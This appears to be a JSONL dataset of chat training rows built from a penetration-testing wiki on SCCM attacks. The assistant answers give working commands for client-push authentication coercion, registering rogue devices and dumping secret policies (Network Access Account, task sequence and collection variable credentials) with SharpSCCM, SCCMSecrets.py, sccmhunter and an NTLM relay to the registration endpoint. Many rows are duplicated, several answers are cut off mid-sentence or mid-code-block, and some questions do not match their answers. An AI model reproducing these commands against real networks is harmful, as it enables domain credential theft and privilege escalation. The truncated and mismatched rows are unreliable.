"assistant", "content": "SharpSCCM.exe invoke client-push -t $TARGET --as-admin"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for If admin access over Management Point (MP)", "response": "SharpSCCM.exe invoke client-push -t $TARGET --as-admin", "metadata": {"corpus_index": 1043, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Client Push account authentication coercion - Step 3: cleanup"}, {"role": "assistant", "content": "If you run the above SharpSCCM command with the --as-admin parameter (since you have admin privileges over the MP), there's nothing to do. Otherwise, get in contact with the administrator of the SCCM system you just messed up and provide the name or IP of the attacker server you provided in the -t $TARGET parameter. This is the device name that will appear in SCCM."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Client Push account authentication coercion - Step 3: cleanup", "response": "If you run the above SharpSCCM command with the --as-admin parameter (since you have admin privileges over the MP), there's nothing to do. Otherwise, get in contact with the administrator of the SCCM system you just messed up and provide the name or IP of the attacker server you provided in the -t $TARGET parameter. This is the device name that will appear in SCCM.", "metadata": {"corpus_index": 1044, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Client Push account authentication coercion - Step 3: cleanup"}, {"role": "assistant", "content": "If you run the above SharpSCCM command with the --as-admin parameter (since you have admin privileges over the MP), there's nothing to do. Otherwise, get in contact with the administrator of the SCCM system you just messed up and provide the name or IP of the attacker server you provided in the -t $TARGET parameter. This is the device name that will appear in SCCM."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Client Push account authentication coercion - Step 3: cleanup", "response": "If you run the above SharpSCCM command with the --as-admin parameter (since you have admin privileges over the MP), there's nothing to do. Otherwise, get in contact with the administrator of the SCCM system you just messed up and provide the name or IP of the attacker server you provided in the -t $TARGET parameter. This is the device name that will appear in SCCM.", "metadata": {"corpus_index": 1044, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/client-push-coercion.md", "page_title": "Client Push account authentication coercion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Credential harvesting - Theory work?"}, {"role": "assistant", "content": "For more details on this subject, see this Synacktiv article.\n\nThis blogpost also contains useful information on the topic.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to credential harvesting in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - CRED-1: PXE Credentials\n> - CRED-2: Policy Request Credentials\n> - CRED-3: DPAPI Credentials\n> - CRED-4: Legacy Credentials\n> - CRED-5: Site Database Credentials\n> - CRED-6: Looting Distribution Points\n> - CRED-7: AdminService API Credentials\n> - CRED-8: Policy Creds MP Relay\n\nAn SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Credential harvesting - Theory work?", "response": "For more details on this subject, see this Synacktiv article.\n\nThis blogpost also contains useful information on the topic.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to credential harvesting in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - CRED-1: PXE Credentials\n> - CRED-2: Policy Request Credentials\n> - CRED-3: DPAPI Credentials\n> - CRED-4: Legacy Credentials\n> - CRED-5: Site Database Credentials\n> - CRED-6: Looting Distribution Points\n> - CRED-7: AdminService API Credentials\n> - CRED-8: Policy Creds MP Relay\n\nAn SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain.", "metadata": {"corpus_index": 1045, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Credential harvesting - Theory?"}, {"role": "assistant", "content": "For more details on this subject, see this Synacktiv article.\n\nThis blogpost also contains useful information on the topic.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to credential harvesting in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - CRED-1: PXE Credentials\n> - CRED-2: Policy Request Credentials\n> - CRED-3: DPAPI Credentials\n> - CRED-4: Legacy Credentials\n> - CRED-5: Site Database Credentials\n> - CRED-6: Looting Distribution Points\n> - CRED-7: AdminService API Credentials\n> - CRED-8: Policy Creds MP Relay\n\nAn SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Credential harvesting - Theory?", "response": "For more details on this subject, see this Synacktiv article.\n\nThis blogpost also contains useful information on the topic.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to credential harvesting in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - CRED-1: PXE Credentials\n> - CRED-2: Policy Request Credentials\n> - CRED-3: DPAPI Credentials\n> - CRED-4: Legacy Credentials\n> - CRED-5: Site Database Credentials\n> - CRED-6: Looting Distribution Points\n> - CRED-7: AdminService API Credentials\n> - CRED-8: Policy Creds MP Relay\n\nAn SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain.", "metadata": {"corpus_index": 1045, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Credential harvesting - Secret policies: Network Access Accounts (NAAs), Task sequences and Collection variables"}, {"role": "assistant", "content": "Some policies may contain sensitive data and are tagged as secret policies. Only registered SCCM devices in the approved state may request them. By default in SCCM, two device registration endpoints are available on the Management Point (MP): http:///ccm_system/request and http:///ccm_system_windowsauth/request. The first one is unauthenticated, meaning that anyone can generate a self-signed certificate and register an arbitrary device; however, by default, devices registered through this endpoint are not approved, which means that they cannot request secret policies. The second endpoint is authenticated and requires credentials for a domain computer account; devices registered through this endpoint are, by default, automatically approved.\n\n> [!TIP]\n> This concretely means that an attacker that has a machine account or that is able to relay one can register an approved device and dump secret policies. Also, note that it is possible for sysadmins to misconfigure SCCM in order to automatically approve any device registering through the unauthenticated registration endpoint. In that case, an unauthenticated attacker on the network could dump secret policies.\n\nThree kinds of policies are tagged as secret and can contain credentials:\n\n* Network Access Accounts (NAAs): NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) if the machine cannot use its machine account. Typically, when a machine has not yet been registered in the domain. NAA does not need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts. NAA credentials are distributed via secret policies.\n* Task sequences: Task sequences are automated workflows that can be deployed by administrators on client devices and that will execute a series of steps. Various task sequence steps require or give the possibility to the administrator to provide domain credentials in order to execute them. They are dist"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Credential harvesting - Secret policies: Network Access Accounts (NAAs), Task sequences and Collection variables", "response": "Some policies may contain sensitive data and are tagged as secret policies. Only registered SCCM devices in the approved state may request them. By default in SCCM, two device registration endpoints are available on the Management Point (MP): http:///ccm_system/request and http:///ccm_system_windowsauth/request. The first one is unauthenticated, meaning that anyone can generate a self-signed certificate and register an arbitrary device; however, by default, devices registered through this endpoint are not approved, which means that they cannot request secret policies. The second endpoint is authenticated and requires credentials for a domain computer account; devices registered through this endpoint are, by default, automatically approved.\n\n> [!TIP]\n> This concretely means that an attacker that has a machine account or that is able to relay one can register an approved device and dump secret policies. Also, note that it is possible for sysadmins to misconfigure SCCM in order to automatically approve any device registering through the unauthenticated registration endpoint. In that case, an unauthenticated attacker on the network could dump secret policies.\n\nThree kinds of policies are tagged as secret and can contain credentials:\n\n* Network Access Accounts (NAAs): NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) if the machine cannot use its machine account. Typically, when a machine has not yet been registered in the domain. NAA does not need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts. NAA credentials are distributed via secret policies.\n* Task sequences: Task sequences are automated workflows that can be deployed by administrators on client devices and that will execute a series of steps. Various task sequence steps require or give the possibility to the administrator to provide domain credentials in order to execute them. They are dist", "metadata": {"corpus_index": 1046, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Credential harvesting - Secret policies: Network Access Accounts (NAAs), Task sequences and Collection variables?"}, {"role": "assistant", "content": "Some policies may contain sensitive data and are tagged as secret policies. Only registered SCCM devices in the approved state may request them. By default in SCCM, two device registration endpoints are available on the Management Point (MP): http:///ccm_system/request and http:///ccm_system_windowsauth/request. The first one is unauthenticated, meaning that anyone can generate a self-signed certificate and register an arbitrary device; however, by default, devices registered through this endpoint are not approved, which means that they cannot request secret policies. The second endpoint is authenticated and requires credentials for a domain computer account; devices registered through this endpoint are, by default, automatically approved.\n\n> [!TIP]\n> This concretely means that an attacker that has a machine account or that is able to relay one can register an approved device and dump secret policies. Also, note that it is possible for sysadmins to misconfigure SCCM in order to automatically approve any device registering through the unauthenticated registration endpoint. In that case, an unauthenticated attacker on the network could dump secret policies.\n\nThree kinds of policies are tagged as secret and can contain credentials:\n\n* Network Access Accounts (NAAs): NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) if the machine cannot use its machine account. Typically, when a machine has not yet been registered in the domain. NAA does not need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts. NAA credentials are distributed via secret policies.\n* Task sequences: Task sequences are automated workflows that can be deployed by administrators on client devices and that will execute a series of steps. Various task sequence steps require or give the possibility to the administrator to provide domain credentials in order to execute them. They are dist"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Credential harvesting - Secret policies: Network Access Accounts (NAAs), Task sequences and Collection variables?", "response": "Some policies may contain sensitive data and are tagged as secret policies. Only registered SCCM devices in the approved state may request them. By default in SCCM, two device registration endpoints are available on the Management Point (MP): http:///ccm_system/request and http:///ccm_system_windowsauth/request. The first one is unauthenticated, meaning that anyone can generate a self-signed certificate and register an arbitrary device; however, by default, devices registered through this endpoint are not approved, which means that they cannot request secret policies. The second endpoint is authenticated and requires credentials for a domain computer account; devices registered through this endpoint are, by default, automatically approved.\n\n> [!TIP]\n> This concretely means that an attacker that has a machine account or that is able to relay one can register an approved device and dump secret policies. Also, note that it is possible for sysadmins to misconfigure SCCM in order to automatically approve any device registering through the unauthenticated registration endpoint. In that case, an unauthenticated attacker on the network could dump secret policies.\n\nThree kinds of policies are tagged as secret and can contain credentials:\n\n* Network Access Accounts (NAAs): NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) if the machine cannot use its machine account. Typically, when a machine has not yet been registered in the domain. NAA does not need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts. NAA credentials are distributed via secret policies.\n* Task sequences: Task sequences are automated workflows that can be deployed by administrators on client devices and that will execute a series of steps. Various task sequence steps require or give the possibility to the administrator to provide domain credentials in order to execute them. They are dist", "metadata": {"corpus_index": 1046, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Credential harvesting - Distribution Points resources?"}, {"role": "assistant", "content": "Policies may reference external resources hosted on a Distribution Point. These resources may be applications, OS images, but also configuration files, PowerShell scripts, certificates, or other kind of file susceptible to contain sensitive technical information such as credentials.\n\nDistribution Point primarily distributes resources via SMB and HTTP. By default, valid domain credentials must be provided to access hosted resources.\n\n> [!TIP]\n> This concretely means that an attacker with any domain account can fetch Distribution Point resources. In addition, it is possible for sysadmins to misconfigure SCCM Distribution Points to allow anonymous access to resources. Note that anonymous access only works with the HTTP protocol, and retrieving Distribution Point resources via SMB always requires authentication, even with anonymous access configured.\n\nSCCM Distribution Points may also be configured to enforce the use of HTTPS. Again, when this is the case, client certificate authentication will be required by the Distribution Point with a domain PKI client certificate."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Credential harvesting - Distribution Points resources?", "response": "Policies may reference external resources hosted on a Distribution Point. These resources may be applications, OS images, but also configuration files, PowerShell scripts, certificates, or other kind of file susceptible to contain sensitive technical information such as credentials.\n\nDistribution Point primarily distributes resources via SMB and HTTP. By default, valid domain credentials must be provided to access hosted resources.\n\n> [!TIP]\n> This concretely means that an attacker with any domain account can fetch Distribution Point resources. In addition, it is possible for sysadmins to misconfigure SCCM Distribution Points to allow anonymous access to resources. Note that anonymous access only works with the HTTP protocol, and retrieving Distribution Point resources via SMB always requires authentication, even with anonymous access configured.\n\nSCCM Distribution Points may also be configured to enforce the use of HTTPS. Again, when this is the case, client certificate authentication will be required by the Distribution Point with a domain PKI client certificate.", "metadata": {"corpus_index": 1047, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Credential harvesting - Distribution Points resources?"}, {"role": "assistant", "content": "Policies may reference external resources hosted on a Distribution Point. These resources may be applications, OS images, but also configuration files, PowerShell scripts, certificates, or other kind of file susceptible to contain sensitive technical information such as credentials.\n\nDistribution Point primarily distributes resources via SMB and HTTP. By default, valid domain credentials must be provided to access hosted resources.\n\n> [!TIP]\n> This concretely means that an attacker with any domain account can fetch Distribution Point resources. In addition, it is possible for sysadmins to misconfigure SCCM Distribution Points to allow anonymous access to resources. Note that anonymous access only works with the HTTP protocol, and retrieving Distribution Point resources via SMB always requires authentication, even with anonymous access configured.\n\nSCCM Distribution Points may also be configured to enforce the use of HTTPS. Again, when this is the case, client certificate authentication will be required by the Distribution Point with a domain PKI client certificate."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Credential harvesting - Distribution Points resources?", "response": "Policies may reference external resources hosted on a Distribution Point. These resources may be applications, OS images, but also configuration files, PowerShell scripts, certificates, or other kind of file susceptible to contain sensitive technical information such as credentials.\n\nDistribution Point primarily distributes resources via SMB and HTTP. By default, valid domain credentials must be provided to access hosted resources.\n\n> [!TIP]\n> This concretely means that an attacker with any domain account can fetch Distribution Point resources. In addition, it is possible for sysadmins to misconfigure SCCM Distribution Points to allow anonymous access to resources. Note that anonymous access only works with the HTTP protocol, and retrieving Distribution Point resources via SMB always requires authentication, even with anonymous access configured.\n\nSCCM Distribution Points may also be configured to enforce the use of HTTPS. Again, when this is the case, client certificate authentication will be required by the Distribution Point with a domain PKI client certificate.", "metadata": {"corpus_index": 1047, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Credential harvesting - Practice work?"}, {"role": "assistant", "content": "As noted in the Theory section, secrets can be harvested from SCCM secret policies, or Distribution Point resources."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Credential harvesting - Practice work?", "response": "As noted in the Theory section, secrets can be harvested from SCCM secret policies, or Distribution Point resources.", "metadata": {"corpus_index": 1048, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Credential harvesting - Practice"}, {"role": "assistant", "content": "As noted in the Theory section, secrets can be harvested from SCCM secret policies, or Distribution Point resources."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Credential harvesting - Practice", "response": "As noted in the Theory section, secrets can be harvested from SCCM secret policies, or Distribution Point resources.", "metadata": {"corpus_index": 1048, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Credential harvesting - Secret SCCM policies?"}, {"role": "assistant", "content": "Only approved SCCM devices can fetch secret policies. It is first possible to register a device ourselves by providing domain machine account credentials (or exploiting automatic device approval).\n\n::: tabs\n\n=== UNIX-based\n\nTo this end, SCCMSecrets.py (Python) can be used. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped. This tool also supports HTTPS / client certificate authentication.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Credential harvesting - Secret SCCM policies?", "response": "Only approved SCCM devices can fetch secret policies. It is first possible to register a device ourselves by providing domain machine account credentials (or exploiting automatic device approval).\n\n::: tabs\n\n=== UNIX-based\n\nTo this end, SCCMSecrets.py (Python) can be used. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped. This tool also supports HTTPS / client certificate authentication.\n\n```bash", "metadata": {"corpus_index": 1049, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Credential harvesting - Secret SCCM policies"}, {"role": "assistant", "content": "Only approved SCCM devices can fetch secret policies. It is first possible to register a device ourselves by providing domain machine account credentials (or exploiting automatic device approval).\n\n::: tabs\n\n=== UNIX-based\n\nTo this end, SCCMSecrets.py (Python) can be used. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped. This tool also supports HTTPS / client certificate authentication.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Credential harvesting - Secret SCCM policies", "response": "Only approved SCCM devices can fetch secret policies. It is first possible to register a device ourselves by providing domain machine account credentials (or exploiting automatic device approval).\n\n::: tabs\n\n=== UNIX-based\n\nTo this end, SCCMSecrets.py (Python) can be used. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped. This tool also supports HTTPS / client certificate authentication.\n\n```bash", "metadata": {"corpus_index": 1049, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Plain HTTP?"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp \"http://$MP_IP\" -u \"$MACHINE_NAME\" -p \"$MACHINE_PASSWORD\" -cn \"newdevice\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Plain HTTP?", "response": "python3 SCCMSecrets.py policies -mp \"http://$MP_IP\" -u \"$MACHINE_NAME\" -p \"$MACHINE_PASSWORD\" -cn \"newdevice\"", "metadata": {"corpus_index": 1050, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Plain HTTP during a pentest?"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp \"http://$MP_IP\" -u \"$MACHINE_NAME\" -p \"$MACHINE_PASSWORD\" -cn \"newdevice\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Plain HTTP during a pentest?", "response": "python3 SCCMSecrets.py policies -mp \"http://$MP_IP\" -u \"$MACHINE_NAME\" -p \"$MACHINE_PASSWORD\" -cn \"newdevice\"", "metadata": {"corpus_index": 1050, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of HTTPS with client certificate"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp https://$MP_IP -u '$MACHINE_NAME' -p '$MACHINE_PASSWORD' -cn 'newdevice' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nNote that if you do not provide machine account credentials, SCCMSecrets.py will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account.\n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/ccm_system_windowsauth/request' -smb2support --sccm-policies -debug\n`\n\nFinally, this attack was first inspired by @xpn_'s work (refer to this blogpost). The tool associated with the blogpost, sccmwtf (Python), is available on Github. It can be used to perform the attack, however with two limitations: it will only dump the NAA secret policy, and it might fail on recent SCCM installations since the encryption algorithm changed.\n\nThe sccmhunter (Python) tool also implements sccmwtf, but with the same limitations.\n`bash\n#Create a new computer account and request the policies\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto\n\n#To use an already controlled computer account\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP\n`\n\n=== Windows-based\n\nOn Windows, SharpSCCM (C#) can be used to register a device and dump secret policies. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets -r newdevice -u $MACHINE_NAME -p $PASSWORD\n`\n\n:::\n\nInstead of registering a new device, it is also possible to use an already compromised SCCM device in order to dump secret policies. Note that this can also be interesting as the compromised device may be part of specific device collections associated with more task sequences or collect"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of HTTPS with client certificate", "response": "python3 SCCMSecrets.py policies -mp https://$MP_IP -u '$MACHINE_NAME' -p '$MACHINE_PASSWORD' -cn 'newdevice' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nNote that if you do not provide machine account credentials, SCCMSecrets.py will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account.\n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/ccm_system_windowsauth/request' -smb2support --sccm-policies -debug\n`\n\nFinally, this attack was first inspired by @xpn_'s work (refer to this blogpost). The tool associated with the blogpost, sccmwtf (Python), is available on Github. It can be used to perform the attack, however with two limitations: it will only dump the NAA secret policy, and it might fail on recent SCCM installations since the encryption algorithm changed.\n\nThe sccmhunter (Python) tool also implements sccmwtf, but with the same limitations.\n`bash\n#Create a new computer account and request the policies\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto\n\n#To use an already controlled computer account\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP\n`\n\n=== Windows-based\n\nOn Windows, SharpSCCM (C#) can be used to register a device and dump secret policies. All secret policies associated with the default collections for the newly registered device (including NAAs, Task sequences and collection variables) will be dumped.\n\n`powershell\n.\\SharpSCCM.exe get secrets -r newdevice -u $MACHINE_NAME -p $PASSWORD\n`\n\n:::\n\nInstead of registering a new device, it is also possible to use an already compromised SCCM device in order to dump secret policies. Note that this can also be interesting as the compromised device may be part of specific device collections associated with more task sequences or collect", "metadata": {"corpus_index": 1051, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do HTTPS with client certificate"}, {"role": "assistant", "content": "python3 SCCMSecrets.py policies -mp https://$MP_IP -u '$MACHINE_NAME' -p '$MACHINE_PASSWORD' -cn 'newdevice' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nNote that if you do not provide machine account credentials, SCCMSecrets.py will use the unauthenticated registration endpoint in order to attempt exploiting automatic device approval.\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain machine account.\n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/ccm_system_windowsauth/request' -smb2support --sccm-policies -debug\n`\n\nFinally, this attack was first inspired by @xpn_'s work (refer to this blogpost). The tool associated with the blogpost, sccmwtf (Python), is available on Github. It can be used to perform the attack, however with two limitations: it will only dump the NAA secret policy, and it might fail on recent SCCM installations since the encryption algorithm changed.\n\nThe sccmhunter (Python) tool also implements sccmwtf, but with the same limitations.\n`bash\n#Create a new computer account and request the policies\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto\n\n#To use an already controlled computer account\npython3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP\n`\n\n=== 